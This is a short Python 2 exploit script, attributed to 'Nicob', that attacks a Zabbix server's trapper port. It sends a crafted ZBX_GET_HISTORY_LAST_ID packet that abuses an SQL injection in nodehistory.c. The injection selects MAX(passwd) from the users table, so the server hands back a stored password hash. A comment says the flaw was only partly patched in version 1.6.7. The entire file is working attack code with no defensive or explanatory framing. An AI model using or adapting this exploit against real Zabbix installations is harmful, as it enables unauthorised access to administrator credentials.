#!/usr/bin/python
# by Nicob

PORT = 10051
HOST = "192.168.2.89"

import socket
import struct

try:
        socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket.settimeout(3)
        socket.connect((HOST, PORT))

        header = 'ZBXD\x01'

	# SQL Injection in ./src/zabbix_server/trapper/nodehistory.c 
	# Was somewhat patched in 1.6.7

	datanew  = 'ZBX_GET_HISTORY_LAST_ID' + '\255' + '666' + '\255\n' 
	# FROM value, must be a valid table name
	datanew += 'users' + '\255'
	# SELECT value, must be a valid field name and is called with MAX()
	datanew += 'passwd' + '\255'

	size = struct.pack('q', len(datanew))
	socket.send(header + size + datanew)
        rcvdata = socket.recv(10240)
	print rcvdata
except:
        print "Houston, we have a problem !"

socket.close()